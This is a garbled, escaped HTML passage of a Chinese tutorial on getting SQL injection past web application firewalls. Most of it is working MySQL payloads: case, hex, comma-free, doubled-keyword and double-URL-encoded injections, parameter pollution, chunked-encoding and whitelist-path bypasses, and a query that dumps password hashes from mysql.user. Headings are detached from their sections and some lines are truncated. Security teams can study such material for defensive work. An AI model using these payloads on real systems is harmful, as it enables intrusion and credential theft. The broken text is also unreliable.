select from users where id=1 \/<\/em>!union\/\/<\/em>!select*\/1,2,3,4;<\/p>\n %09 TAB \u952e\uff08\u6c34\u5e73\uff09<\/p>\n %0a \u65b0\u5efa\u4e00\u884c<\/p>\n %0c \u65b0\u7684\u4e00\u9875<\/p>\n %0d return \u529f\u80fd<\/p>\n %0b TAB \u952e\uff08\u5782\u76f4\uff09<\/p>\n %a0 \u7a7a\u683c<\/p>\n \u53ef\u4ee5\u5c06\u7a7a\u683c\u5b57\u7b26\u66ff\u6362\u6210\u6ce8\u91ca \/*\/ \u8fd8\u53ef\u4ee5\u4f7f\u7528 \/<\/em>!\u8fd9\u91cc\u7684\u6839\u636e mysql \u7248\u672c\u7684\u5185\u5bb9\u4e0d\u6ce8\u91ca*\/<\/p>\n \u5c06\u5b57\u7b26\u4e32\u8bbe\u7f6e\u4e3a\u5927\u5c0f\u5199\uff0c\u4f8b\u5982 and 1=1 \u8f6c\u6210 AND 1=1 AnD 1=1<\/p>\n select * from users where id=1 UNION SELECT 1,2,3,4;<\/p>\n select * from users where id=1 UniON SelECT 1,2,3,4;<\/p>\n \u8fc7\u6ee4\u7a7a\u683c\u53ef\u4ee5\u7528%0 \u4ee3\u66ff \u4e5f\u8fc7\u6ee4# — \u6ce8\u91ca \u7528\u5b57\u7b26\u4e32\u5339\u914d<\/p>\n select * from users where id=8E0union select 1,2,3,4;<\/p>\n select * from users where id=8.0union select 1,2,3,4;<\/p>\n elect N; \u4ee3\u8868 null<\/p>\n elect * from users where id=Nunion select 1,2,3,N;<\/p>\n select * from users where id=Nunion select 1,2,3,Nfrom users;<\/p>\n \u5982\u679c waf \u62e6\u622a\u8fc7\u6ee4\u5355\u5f15\u53f7\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u4f7f\u7528\u53cc\u5f15\u53f7 \u5728 mysql \u91cc\u4e5f\u53ef\u4ee5\u7528\u53cc\u5f15\u53f7\u4f5c\u4e3a\u5b57\u7b26\u4e32\u3002<\/p>\n select * from users where id=’1′;<\/p>\n select * from users where id="1";<\/p>\n \u4e5f\u53ef\u4ee5\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u6210 16 \u8fdb\u5236 \u518d\u8fdb\u884c\u67e5\u8be2\u3002<\/p>\n select hex(‘admin’);<\/p>\n select * from users where username=’admin’;<\/p>\n select * from users where username=0x61646D696E;<\/p>\n \u5982\u679c gpc \u5f00\u542f\u4e86\uff0c\u4f46\u662f\u6ce8\u5165\u70b9\u662f\u6574\u5f62 \u4e5f\u53ef\u4ee5\u7528 hex \u5341\u516d\u8fdb\u5236\u8fdb\u884c\u7ed5\u8fc7<\/p>\n select * from users where id=-1 union select 1,2,(select group_concat(column_name)<\/p>\n from information_schema.columns where TABLE_NAME=’users’ limit 1),4;<\/p>\n select * from users where id=-1 union select 1,2,(select group_concat(column_name)<\/p>\n from information_schema.columns where TABLE_NAME=0x7573657273 limit 1),4;<\/p>\n \u53ef\u4ee5\u770b\u5230\u5b58\u5728\u6574\u578b\u6ce8\u5165\u7684\u65f6\u5019 \u6ca1\u6709\u7528\u5230\u5355\u5f15\u53f7 \u6240\u4ee5\u53ef\u4ee5\u6ce8\u5165\u3002<\/p>\n \u4ee5\u4e0b\u4e24\u6761\u67e5\u8be2\u8bed\u53e5\uff0c\u6267\u884c\u7684\u7ed3\u679c\u662f\u4e00\u81f4\u7684\uff0c\u4f46\u662f\u6709\u4e9b waf \u7684\u62e6\u622a\u89c4\u5219 \u5e76\u4e0d\u4f1a\u62e6<\/p>\n \u622a[\u5e93\u540d].[\u8868\u540d]\u8fd9\u79cd\u6a21\u5f0f\u3002<\/p>\n select * from users where id=-1 union select 1,2,3,4 from users;<\/p>\n select * from users where id=-1 union select 1,2,3,4 from moonsec.users;<\/p>\n mysql \u4e2d\u4e5f\u53ef\u4ee5\u6dfb\u52a0\u5e93\u540d\u67e5\u8be2\u8868\u3002\u4f8b\u5982\u8de8\u5e93\u67e5\u8be2 mysql \u5e93\u91cc\u7684 usrs \u8868\u7684\u5185\u5bb9\u3002<\/p>\n select * from users where id=-1 union select 1,2,3,concat(user,authentication_string)<\/p>\n from mysql.user;<\/p>\n \u5728 mysql \u67e5\u8be2\u53ef\u4ee5\u4f7f\u7528 distinct \u53bb\u9664\u67e5\u8be2\u7684\u91cd\u590d\u503c\u3002\u53ef\u4ee5\u5229\u7528\u8fd9\u70b9\u7a81\u7834 waf \u62e6\u622a<\/p>\n select * from users where id=-1 union distinct select 1,2,3,4 from users;<\/p>\n select * from users where id=-1 union distinct select 1,2,3,version() from users;<\/p>\n \u5728 mysql \u53ef\u4ee5\u4f7f\u7528 insert into users(username,password,email)values(‘moonsec’,’123456′,’admin@moonsec.com’);<\/p>\n insert into users( \u5728 php \u8bed\u8a00\u4e2d id=1&id=2 \u540e\u9762\u7684\u503c\u4f1a\u81ea\u52a8\u8986\u76d6\u524d\u9762\u7684\u503c\uff0c\u4e0d\u540c\u7684\u8bed\u8a00\u6709\u4e0d\u540c\u7684\u7279\u6027\u3002\u53ef\u4ee5\u5229\u7528\u8fd9\u70b9\u7ed5\u8fc7\u4e00\u4e9b waf \u7684\u62e6\u622a\u3002id=1%00&id=2 union select 1,2,3<\/p>\n \u6709\u4e9b waf \u56de\u53bb\u5339\u914d\u7b2c\u4e00\u4e2a id \u53c2\u6570 1%00 %00 \u662f\u622a\u65ad\u5b57\u7b26\uff0cwaf \u4f1a\u81ea\u52a8\u622a\u65ad \u4ece\u800c\u4e0d\u4f1a\u68c0\u6d4b\u540e\u9762\u7684\u5185\u5bb9\u3002\u5230\u4e86\u7a0b\u5e8f\u4e2d id \u5c31\u662f\u7b49\u4e8e id=2 union select 1,2,3 \u4ece\u7ed5\u8fc7\u6ce8\u5165\u62e6\u622a\u3002<\/p>\n \u5176\u4ed6\u8bed\u8a00\u7279\u6027<\/p>\n \u76ee\u524d\u6709\u4e9b\u9632\u6ce8\u5165\u811a\u672c\u90fd\u4f1a\u9017\u53f7\u8fdb\u884c\u62e6\u622a\uff0c\u4f8b\u5982\u5e38\u89c4\u6ce8\u5165\u4e2d\u5fc5\u987b\u5305\u542b\u9017\u53f7<\/p>\n select * from users where id=1 union select 1,2,3,4;<\/p>\n \u4e00\u822c\u4f1a\u5bf9\u9017\u53f7\u8fc7\u6ee4\u6210\u7a7a select * from users where id=1 union select 1 2 3 4;\u8fd9\u6837<\/p>\n SQL \u8bed\u53e5\u5c31\u4f1a\u51fa\u9519\u3002\u6240\u4ee5 \u53ef\u4ee5\u4e0d\u4f7f\u7528\u9017\u53f7\u8fdb\u884c SQL \u6ce8\u5165\u3002<\/p>\n select(substr(database() from 1 for 1)); \u67e5\u8be2\u5f53\u524d\u5e93\u7b2c\u4e00\u4e2a\u5b57\u7b26<\/p>\n \u67e5\u8be2 m \u7b49\u4e8e select(substr(database() from 1 for 1))\u9875\u9762\u8fd4\u56de\u6b63\u5e38<\/p>\n select * from users where id=1 and ‘m’=(select(substr(database() from 1 for 1)));<\/p>\n \u53ef\u4ee5\u8fdb\u4e00\u6b65\u4f18\u5316 m \u6362\u6210 hex 0x6D \u8fd9\u6837\u5c31\u907f\u514d\u4e86\u5355\u5f15\u53f7<\/p>\n select * from users where id=1 and 0x6D=(select(substr(database() from 1 for 1)));<\/p>\n \u8fd9\u4e2a min \u51fd\u6570\u8ddf substr \u51fd\u6570\u529f\u80fd\u76f8\u540c \u5982\u679c substr \u51fd\u6570\u88ab\u62e6\u622a\u6216\u8005\u8fc7\u6ee4\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u51fd\u6570\u4ee3\u66ff\u3002<\/p>\n select mid(database() from 1 for 1); \u8fd9\u4e2a\u65b9\u6cd5\u5982\u4e0a\u3002<\/p>\n select * from users where id=1 and ‘m’=(select(mid(database() from 1 for 1)));<\/p>\n select * from users where id=1 and 0x6D=(select(mid(database() from 1 for 1)));<\/p>\n \u4f7f\u7528 join \u81ea\u8fde\u63a5\u4e24\u4e2a\u8868<\/p>\n union select 1,2 #\u7b49\u4ef7\u4e8e union select * from (select 1)a join (select 2)b<\/p>\n a \u548c b \u5206\u522b\u662f\u8868\u7684\u522b\u540d<\/p>\n select * from users where id=-1 union select 1,2,3,4;<\/p>\n select from users where id=-1 union select <\/em> from (select 1)a join (select 2)b<\/p>\n join(select 3)c join(select 4)d;<\/p>\n select from users where id=-1 union select <\/em> from (select 1)a join (select 2)b<\/p>\n join(select user())c join(select 4)d;<\/p>\n \u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u4e5f\u6ca1\u6709\u4f7f\u7528\u9017\u53f7\uff0c\u4ece\u800c\u7ed5\u8fc7 waf \u5bf9\u9017\u53f7\u7684\u62e6\u622a\u3002<\/p>\n \u4f7f\u7528 like \u6a21\u7cca\u67e5\u8be2 select user() like ‘%r%’; \u6a21\u7cca\u67e5\u8be2\u6210\u529f\u8fd4\u56de 1 \u5426\u5219\u8fd4\u56de 0<\/p>\n \u627e\u5230\u7b2c\u4e00\u4e2a\u5b57\u7b26\u540e\u7ee7\u7eed\u8fdb\u884c\u4e0b\u4e00\u4e2a\u5b57\u7b26\u5339\u914d\u3002\u4ece\u800c\u627e\u5230\u6240\u6709\u7684\u5b57\u7b26\u4e32 \u6700\u540e\u5c31\u662f\u8981\u67e5\u8be2\u7684\u5185\u5bb9\uff0c\u8fd9\u79cd SQL \u6ce8\u5165\u8bed\u53e5\u4e5f\u4e0d\u4f1a\u5b58\u5728\u9017\u53f7\u3002\u4ece\u800c\u7ed5\u8fc7 waf \u62e6\u622a\u3002<\/p>\n SQL \u6ce8\u5165\u65f6\uff0c\u5982\u679c\u9700\u8981\u9650\u5b9a\u6761\u76ee\u53ef\u4ee5\u4f7f\u7528 limit 0,1 \u9650\u5b9a\u8fd4\u56de\u6761\u76ee\u7684\u6570\u76ee limit 0,1\u8fd4\u56de\u6761\u4e00\u6761\u8bb0\u5f55 \u5982\u679c\u5bf9\u9017\u53f7\u8fdb\u884c\u62e6\u622a\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528 limit 1 \u9ed8\u8ba4\u8fd4\u56de\u7b2c\u4e00\u6761\u6570\u636e\u3002\u4e5f\u53ef\u4ee5\u4f7f\u7528 limit 1 offset 0 \u4ece\u96f6\u5f00\u59cb\u8fd4\u56de\u7b2c\u4e00\u6761\u8bb0\u5f55\uff0c\u8fd9\u6837\u5c31\u7ed5\u8fc7 waf \u62e6\u622a\u4e86\u3002<\/p>\n \u76ee\u524d\u4e3b\u6d41\u7684 waf \u90fd\u4f1a\u5bf9 id=1 and 1=2\u3001id=1 or 1=2\u3001id=0 or 1=2<\/p>\n id=0 xor 1=1 limit 1 \u3001id=1 xor 1=2<\/p>\n \u5bf9\u8fd9\u4e9b\u5e38\u89c1\u7684 SQL \u6ce8\u5165\u68c0\u6d4b\u8bed\u53e5\u8fdb\u884c\u62e6\u622a\u3002\u50cf and \u8fd9\u4e9b\u8fd8\u6709\u5b57\u7b26\u4ee3\u66ff<\/p>\n \u5b57\u7b26\u5982\u4e0b<\/p>\n and \u7b49\u4e8e&&<\/p>\n or \u7b49\u4e8e ||<\/p>\n not \u7b49\u4e8e !<\/p>\n xor \u7b49\u4e8e|<\/p>\n \u6240\u4ee5\u53ef\u4ee5\u8f6c\u6362\u6210\u8fd9\u6837<\/p>\n id=1 and 1=1 \u7b49\u4e8e id=1 && 1=1<\/p>\n id=1 and 1=2 \u7b49\u4e8e id=1 && 1=2<\/p>\n id=1 or 1=1 \u7b49\u4e8e id=1 || 1=1<\/p>\n id=0 or 1=0 \u7b49\u4e8e id=0 || 1=0<\/p>\n \u53ef\u4ee5\u7ed5\u8fc7\u4e00\u4e9b waf \u62e6\u622a\u7ee7\u7eed\u5bf9\u6ce8\u5165\u70b9\u8fdb\u884c\u5b89\u5168\u68c0\u6d4b<\/p>\n \u4e5f\u53ef\u4ee5\u4f7f\u7528\u8fd0\u7b97\u7b26\u53f7<\/p>\n id=1 && 2=1+1<\/p>\n id=1 && 2=1-1<\/p>\n \u8bb8\u591a waf \u4f1a\u5bf9 union select \u8fdb\u884c\u62e6\u622a \u800c\u4e14\u901a\u5e38\u6bd4\u8f83\u53d8\u6001\uff0c\u90a3\u4e48\u53ef\u4ee5\u4e0d\u4f7f\u7528\u8054\u5408\u67e5<\/p>\n \u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528\u5b57\u7b26\u622a\u53d6\u5bf9\u6bd4\u6cd5\uff0c\u8fdb\u884c\u7a81\u7834\u3002<\/p>\n select substring(user(),1,1);<\/p>\n select * from users where id=1 and substring(user(),1,1)=’r’;<\/p>\n select * from users where id=1 and ascii(substring(user(),1,1))=114;<\/p>\n \u6700\u597d\u628a’r’\u6362\u6210\u6210 ascii \u7801 \u5982\u679c\u5f00\u542f gpc int \u6ce8\u5165\u5c31\u4e0d\u80fd\u7528\u4e86\u3002<\/p>\n \u53ef\u4ee5\u770b\u5230\u6784\u9020\u5f97 SQL \u653b\u51fb\u8bed\u53e5\u6ca1\u6709\u4f7f\u7528\u8054\u5408\u67e5\u8be2(union select)\u4e5f\u53ef\u4ee5\u628a\u6570\u636e\u67e5\u8be2\u51fa\u6765\u3002<\/p>\n \u5982\u679c\u7a0b\u5e8f\u4f1a\u5bf9=\u8fdb\u884c\u62e6\u622a \u53ef\u4ee5\u4f7f\u7528 like rlike regexp \u6216\u8005\u4f7f\u7528<\u6216\u8005><\/p>\n select * from users where id=1 and ascii(substring(user(),1,1))<115;<\/p>\n select * from users where id=1 and ascii(substring(user(),1,1))>115;<\/p>\n select * from users where id=1 and (select substring(user(),1,1)like ‘r%’);<\/p>\n select * from users where id=1 and (select substring(user(),1,1)rlike ‘r’);<\/p>\n select * from users where id=1 and 1=(select user() regexp ‘^r’);<\/p>\n select * from users where id=1 and 1=(select user() regexp ‘^a’);<\/p>\n regexp \u540e\u9762\u662f\u6b63\u5219<\/p>\n \u6709\u4e9b\u7a0b\u5e8f\u4f1a\u5bf9\u5355\u8bcd union\u3001 select \u8fdb\u884c\u8f6c\u7a7a \u4f46\u662f\u53ea\u4f1a\u8f6c\u4e00\u6b21\u8fd9\u6837\u4f1a\u7559\u4e0b\u5b89\u5168\u9690\u60a3\u3002<\/p>\n \u53cc\u5173\u952e\u5b57\u7ed5\u8fc7\uff08\u82e5\u5220\u9664\u6389\u7b2c\u4e00\u4e2a\u5339\u914d\u7684 union \u5c31\u80fd\u7ed5\u8fc7\uff09<\/p>\n id=-1’UNIunionONSeLselectECT1,2,3–+<\/p>\n \u5230\u6570\u636e\u5e93\u91cc\u6267\u884c\u4f1a\u53d8\u6210 id=-1’UNION SeLECT1,2,3–+ \u4ece\u800c\u7ed5\u8fc7\u6ce8\u5165\u62e6\u622a\u3002<\/p>\n \u6709\u4e9b\u7a0b\u5e8f\u4f1a\u89e3\u6790\u4e8c\u6b21\u7f16\u7801\uff0c\u9020\u6210 SQL \u6ce8\u5165\uff0c\u56e0\u4e3a url \u4e24\u6b21\u7f16\u7801\u8fc7\u540e\uff0cwaf \u662f\u4e0d\u4f1a\u62e6\u622a\u7684\u3002<\/p>\n -1 union select 1,2,3,4#<\/p>\n \u7b2c\u4e00\u6b21\u8f6c\u7801<\/p>\n %2d%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%23<\/p>\n \u7b2c\u4e8c\u6b21\u8f6c\u7801<\/p>\n %25%32%64%25%33%31%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%33<\/p>\n \u4e8c\u6b21\u7f16\u7801\u6ce8\u5165\u6f0f\u6d1e\u5206\u6790 \u5728\u6e90\u4ee3\u7801\u4e2d\u5df2\u7ecf\u5f00\u542f\u4e86 gpc \u5bf9\u7279\u6b8a\u5b57\u7b26\u8fdb\u884c\u8f6c\u4e49\u4ee3\u7801\u91cc\u6709 urldecode \u8fd9\u4e2a\u51fd\u6570\u662f\u5bf9\u5b57\u7b26 url \u89e3\u7801\uff0c\u56e0\u4e3a\u4e24\u6b21\u7f16\u7801 GPC \u662f\u4e0d\u4f1a\u8fc7\u6ee4\u7684\uff0c\u6240\u4ee5\u53ef\u4ee5\u7ed5\u8fc7 gpc \u5b57\u7b26\u8f6c\u4e49\uff0c\u8fd9\u6837\u4e5f\u5c31\u7ed5\u8fc7\u4e86 waf \u7684\u62e6\u622a\u3002<\/p>\n \u591a\u4f59\u591a\u4e2a\u53c2\u6570\u62fc\u63a5\u5230\u540c\u4e00\u6761 SQL \u8bed\u53e5\u4e2d\uff0c\u53ef\u4ee5\u5c06\u6ce8\u5165\u8bed\u53e5\u5206\u5272\u63d2\u5165\u3002<\/p>\n \u4f8b\u5982\u8bf7\u6c42 get \u53c2\u6570<\/p>\n a=[input1]&b=[input2] \u53ef\u4ee5\u5c06\u53c2\u6570 a \u548c b \u62fc\u63a5\u5728 SQL \u8bed\u53e5\u4e2d\u3002<\/p>\n \u5728\u7a0b\u5e8f\u4ee3\u7801\u4e2d\u770b\u5230\u4e24\u4e2a\u53ef\u63a7\u7684\u53c2\u6570\uff0c\u4f46\u662f\u4f7f\u7528 union select \u4f1a\u88ab waf \u62e6\u622a<\/p>\n \u90a3\u4e48\u53ef\u4ee5\u4f7f\u7528\u53c2\u6570\u62c6\u4efd\u8bf7\u6c42\u7ed5\u8fc7 waf \u62e6\u622a<\/p>\n -1’union\/&username=<\/em>\/select 1,user(),3,4–+<\/p>\n \u4e24\u4e2a\u53c2\u6570\u7684\u503c\u53ef\u4ee5\u63a7\uff0c\u5206\u89e3 SQL \u6ce8\u5165\u5173\u952e\u5b57 \u53ef\u4ee5\u7ec4\u5408\u4e00\u4e9b SQL \u6ce8\u5165\u8bed\u53e5\u7a81\u7834<\/p>\n waf \u62e6\u622a\u3002<\/p>\n \u4f7f\u7528\u751f\u50fb\u51fd\u6570\u66ff\u4ee3\u5e38\u89c1\u7684\u51fd\u6570\uff0c\u4f8b\u5982\u5728\u62a5\u9519\u6ce8\u5165\u4e2d\u4f7f\u7528 polygon()\u51fd\u6570\u66ff\u6362\u5e38\u7528<\/p>\n \u7684 updatexml()\u51fd\u6570<\/p>\n select polygon((select from (select <\/em> from (select @@version) f) x));<\/p>\n \u4e00\u3001\u4ec0\u4e48\u662f chunked \u7f16\u7801\uff1f<\/p>\n \u5206\u5757\u4f20\u8f93\u7f16\u7801\uff08Chunked transfer encoding\uff09\u662f\u53ea\u5728 HTTP \u534f\u8bae 1.1 \u7248\u672c\uff08HTTP\/1.1\uff09\u4e2d\u63d0\u4f9b\u7684\u4e00\u79cd\u6570\u636e\u4f20\u9001\u673a\u5236\u3002\u4ee5\u5f80 HTTP \u7684\u5e94\u7b54\u4e2d\u6570\u636e\u662f\u6574\u4e2a\u4e00\u8d77\u53d1\u9001\u7684\uff0c\u5e76\u5728\u5e94\u7b54\u5934\u91cc Content-Length \u5b57\u6bb5\u6807\u8bc6\u4e86\u6570\u636e\u7684\u957f\u5ea6\uff0c\u4ee5\u4fbf\u5ba2\u6237\u7aef\u77e5\u9053\u5e94\u7b54\u6d88\u606f\u7684\u7ed3\u675f\u3002<\/p>\n \u4f20\u7edf\u7684 Content-length \u89e3\u51b3\u65b9\u6848\uff1a\u8ba1\u7b97\u5b9e\u4f53\u957f\u5ea6\uff0c\u5e76\u901a\u8fc7\u5934\u90e8\u544a\u8bc9\u5bf9\u65b9\u3002\u6d4f\u89c8\u5668\u53ef\u4ee5\u901a\u8fc7 Content-Length \u7684\u957f\u5ea6\u4fe1\u606f\uff0c\u5224\u65ad\u51fa\u54cd\u5e94\u5b9e\u4f53\u5df2\u7ed3\u675fContent-length \u9762\u4e34\u7684\u95ee\u9898\uff1a\u7531\u4e8e Content-Length \u5b57\u6bb5\u5fc5\u987b\u771f\u5b9e\u53cd\u6620\u5b9e\u4f53\u957f\u5ea6\uff0c\u4f46\u662f\u5bf9\u4e8e\u52a8\u6001\u751f\u6210\u7684\u5185\u5bb9\u6765\u8bf4\uff0c\u5728\u5185\u5bb9\u521b\u5efa\u5b8c\u4e4b\u524d\uff0c\u957f\u5ea6\u662f\u4e0d\u53ef\u77e5\u7684\u3002<\/p>\n \u8fd9\u65f6\u5019\u8981\u60f3\u51c6\u786e\u83b7\u53d6\u957f\u5ea6\uff0c\u53ea\u80fd\u5f00\u4e00\u4e2a\u8db3\u591f\u5927\u7684 buffer\uff0c\u7b49\u5185\u5bb9\u5168\u90e8\u751f\u6210\u597d\u518d\u8ba1\u7b97\u3002\u8fd9\u6837\u505a\u4e00\u65b9\u9762\u9700\u8981\u66f4\u5927\u7684\u5185\u5b58\u5f00\u9500\uff0c\u53e6\u4e00\u65b9\u9762\u4e5f\u4f1a\u8ba9\u5ba2\u6237\u7aef\u7b49\u66f4\u4e45\u3002\u6211\u4eec\u9700\u8981\u4e00\u4e2a\u65b0\u7684\u673a\u5236\uff1a\u4e0d\u4f9d\u8d56\u5934\u90e8\u7684\u957f\u5ea6\u4fe1\u606f\uff0c\u4e5f\u80fd\u77e5\u9053\u5b9e\u4f53\u7684\u8fb9\u754c\u2014\u2014\u5206\u5757\u7f16\u7801\uff08Transfer-Encoding: chunked\uff09\u3002<\/p>\n \u5bf9\u4e8e\u52a8\u6001\u751f\u6210\u7684\u5e94\u7b54\u5185\u5bb9\u6765\u8bf4\uff0c\u5185\u5bb9\u5728\u672a\u751f\u6210\u5b8c\u6210\u524d\u603b\u957f\u5ea6\u662f\u4e0d\u53ef\u77e5\u7684\u3002\u56e0\u6b64\u9700\u8981\u5148\u7f13\u5b58\u751f\u6210\u7684\u5185\u5bb9\uff0c\u518d\u8ba1\u7b97\u603b\u957f\u5ea6\u586b\u5145\u5230 Content-Length\uff0c\u518d\u53d1\u9001\u6574\u4e2a\u6570\u636e\u5185\u5bb9\u3002\u8fd9\u6837\u663e\u5f97\u4e0d\u592a\u7075\u6d3b\uff0c\u800c\u4f7f\u7528\u5206\u5757\u7f16\u7801\u5219\u80fd\u5f97\u5230\u6539\u89c2\u3002\u5206\u5757\u4f20\u8f93\u7f16\u7801\u5141\u8bb8\u670d\u52a1\u5668\u5728\u6700\u540e\u53d1\u9001\u6d88\u606f\u5934\u5b57\u6bb5\u3002\u4f8b\u5982\u5728\u5934\u4e2d\u6dfb\u52a0\u6563\u5217\u7b7e\u540d\u3002\u5bf9\u4e8e\u538b\u7f29\u4f20\u8f93\u4f20\u8f93\u800c\u8a00\uff0c\u53ef\u4ee5\u4e00\u8fb9\u538b\u7f29\u4e00\u8fb9\u4f20\u8f93\u3002<\/p>\n \u4e8c\u3001\u5982\u4f55\u4f7f\u7528 chunked \u7f16\u7801<\/p>\n \u5982\u679c\u5728 http \u7684\u6d88\u606f\u5934\u91cc Transfer-Encoding \u4e3a chunked\uff0c\u90a3\u4e48\u5c31\u662f\u4f7f\u7528\u6b64\u79cd\u7f16\u7801\u65b9\u5f0f\u3002<\/p>\n \u63a5\u4e0b\u6765\u4f1a\u53d1\u9001\u6570\u91cf\u672a\u77e5\u7684\u5757\uff0c\u6bcf\u4e00\u4e2a\u5757\u7684\u5f00\u5934\u90fd\u6709\u4e00\u4e2a\u5341\u516d\u8fdb\u5236\u7684\u6570,\u8868\u660e\u8fd9\u4e2a\u5757 \u7684 \u5927 \u5c0f \uff0c \u7136 \u540e \u63a5 CRLF("rn") \u3002 \u7136 \u540e \u662f \u6570 \u636e \u672c \u8eab \uff0c \u6570 \u636e \u7ed3 \u675f \u540e \uff0c \u8fd8 \u4f1a \u6709CRLF("rn")\u4e24\u4e2a\u5b57\u7b26\u3002\u6709\u4e00\u4e9b\u5b9e\u73b0\u4e2d\uff0c\u5757\u5927\u5c0f\u7684\u5341\u516d\u8fdb\u5236\u6570\u548c CRLF \u4e4b\u95f4\u53ef\u4ee5\u6709\u7a7a\u683c\u3002\u6700\u540e\u4e00\u5757\u7684\u5757\u5927\u5c0f\u4e3a 0\uff0c\u8868\u660e\u6570\u636e\u53d1\u9001\u7ed3\u675f\u3002\u6700\u540e\u4e00\u5757\u4e0d\u518d\u5305\u542b\u4efb\u4f55\u6570\u636e\uff0c\u4f46\u662f\u53ef\u4ee5\u53d1\u9001\u53ef\u9009\u7684\u5c3e\u90e8\uff0c\u5305\u62ec\u6d88\u606f\u5934\u5b57\u6bb5\u3002\u6d88\u606f\u6700\u540e\u4ee5 CRLF \u7ed3\u5c3e\u3002<\/p>\n \u5728\u5934\u90e8\u52a0\u5165 Transfer-Encoding: chunked \u4e4b\u540e\uff0c\u5c31\u4ee3\u8868\u8fd9\u4e2a\u62a5\u6587\u91c7\u7528\u4e86\u5206\u5757\u7f16\u7801\u3002\u8fd9\u65f6\uff0c\u62a5\u6587\u4e2d\u7684\u5b9e\u4f53\u9700\u8981\u6539\u4e3a\u7528\u4e00\u7cfb\u5217\u5206\u5757\u6765\u4f20\u8f93\u3002<\/p>\n \u5206\u5757\u4f20\u8f93 \u4f7f\u7528<\/p>\n \u6bcf\u4e2a\u5206\u5757\u5305\u542b\u5341\u516d\u8fdb\u5236\u7684\u957f\u5ea6\u503c\u548c\u6570\u636e\uff0c\u957f\u5ea6\u503c\u72ec\u5360\u4e00\u884c\uff0c\u957f\u5ea6\u4e0d\u5305\u62ec\u5b83\u7ed3\u5c3e\u7684<\/p>\n CRLF(rn)\uff0c\u4e5f\u4e0d\u5305\u62ec\u5206\u5757\u6570\u636e\u7ed3\u5c3e\u7684 CRLF(rn)\u3002<\/p>\n \u6700\u540e\u4e00\u4e2a\u5206\u5757\u957f\u5ea6\u503c\u5fc5\u987b\u4e3a 0\uff0c\u5bf9\u5e94\u7684\u5206\u5757\u6570\u636e\u6ca1\u6709\u5185\u5bb9\uff0c\u8868\u793a\u5b9e\u4f53\u7ed3\u675f\u3002<\/p>\n \u4f8b\uff1a<\/p>\n \u7528 burpsuite \u6293\u5305\u63d0\u4ea4\u5206\u6790 \u9996\u5148\u539f\u751f\u5305 id=1&submit=1 \u67e5\u8be2\u5230\u7528\u6237 id \u4e3a 1 \u7684\u503c<\/p>\n \u4f7f\u7528\u5206\u5757\u4f20\u8f93 \u9996\u5148\u5728 http \u5934\u52a0\u4e0a Transfer-Encoding: chunked \u8868\u793a\u5206\u5757\u4f20\u8f93\u4f20\u9001<\/p>\n \u7b2c\u4e00\u884c\u662f\u957f\u5ea6 \u7b2c\u4e8c\u884c\u662f\u5b57\u7b26\u4e32 0 \u8868\u793a\u4f20\u8f93\u7ed3\u675f \u540e\u9762\u8ddf\u4e0a\u4e24\u4e2a\u7a7a\u683c\u3002<\/p>\n \u4e5f\u53ef\u4ee5\u4f7f\u7528 burpsuite \u7684\u63d2\u4ef6 chunked-coding-converter \u8fdb\u884c\u7f16\u7801\u63d0\u4ea4<\/p>\n \u5c06 SQL \u6ce8\u5165\u653b\u51fb\u8bed\u53e5\u7528\u533a\u5757\u4f20\u8f93\u7f16\u7801\u8f6c\u6362\u540e\u63d0\u4ea4\u6210\u529f\u83b7\u53d6\u6570\u636e\u5e93\u7528\u6237\u4fe1\u606f<\/p>\n \u6709\u4e9b WAF \u4f1a\u81ea\u5e26\u4e00\u4e9b\u6587\u4ef6\u767d\u540d\u5355\uff0c\u5bf9\u4e8e\u767d\u540d\u5355 waf \u4e0d\u4f1a\u62e6\u622a\u4efb\u4f55\u64cd\u4f5c\uff0c\u6240\u4ee5\u53ef<\/p>\n \u4ee5\u5229\u7528\u8fd9\u4e2a\u7279\u70b9\uff0c\u53ef\u4ee5\u8bd5\u8bd5\u767d\u540d\u5355\u7ed5\u8fc7\u3002<\/p>\n \u767d\u540d\u5355\u901a\u5e38\u6709\u76ee\u5f55<\/p>\n \/admin<\/p>\n \/phpmyadmin<\/p>\n \/admin.php<\/p>\n http:\/\/192.168.0.115\/06\/vul\/sqli\/sqli_str.php?a=\/admin.php&name=vince+&submit=1<\/a><\/p>\n\u5927\u5c0f\u5199\u7ed5\u8fc7<\/h2>\n
\u6d6e\u70b9\u6570\u7ed5\u8fc7<\/h2>\n
NULL\u503c\u7ed5\u8fc7<\/h2>\n
\u5f15\u53f7\u7ed5\u8fc7<\/h2>\n
\u6dfb\u52a0\u5e93\u540d\u7ed5\u8fc7<\/h2>\n
\u53bb\u91cd\u590d\u7ed5\u8fc7<\/h2>\n
\u53cd\u5f15\u53f7\u7ed5\u8fc7<\/h2>\n
\u8fd9\u91cc\u662f\u53cd\u5f15\u53f7<\/code> \u7ed5\u8fc7\u4e00\u4e9b waf \u62e6\u622a\u3002\u5b57\u6bb5\u53ef\u4ee5\u52a0\u53cd\u5f15\u53f7\u6216\u8005\u4e0d\u52a0\uff0c\u610f\u4e49\u76f8\u540c\u3002<\/p>\nusername<\/code>,password<\/code>,email<\/code>)values(‘moonsec’,’123456′,’admin@moonsec.com’);<\/p>\n\u811a\u672c\u8bed\u8a00\u7279\u6027\u7ed5\u8fc7<\/h2>\n
![\"1745992208993-b6b65592-61fd-4c72-a3a3-7a2b46f4789f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae6619d0c2.png\")
<\/p>\n\u9017\u53f7\u7ed5\u8fc7<\/h2>\n
substr\u622a\u53d6\u5b57\u7b26\u4e32<\/h2>\n
min\u622a\u53d6\u5b57\u7b26\u4e32<\/h2>\n
join\u7ed5\u8fc7<\/h2>\n
like\u7ed5\u8fc7<\/h2>\n
limit offset\u7ed5\u8fc7<\/h2>\n
or and xor not\u7ed5\u8fc7<\/h2>\n
ascii\u5b57\u7b26\u5bf9\u6bd4\u7ed5\u8fc7<\/h2>\n
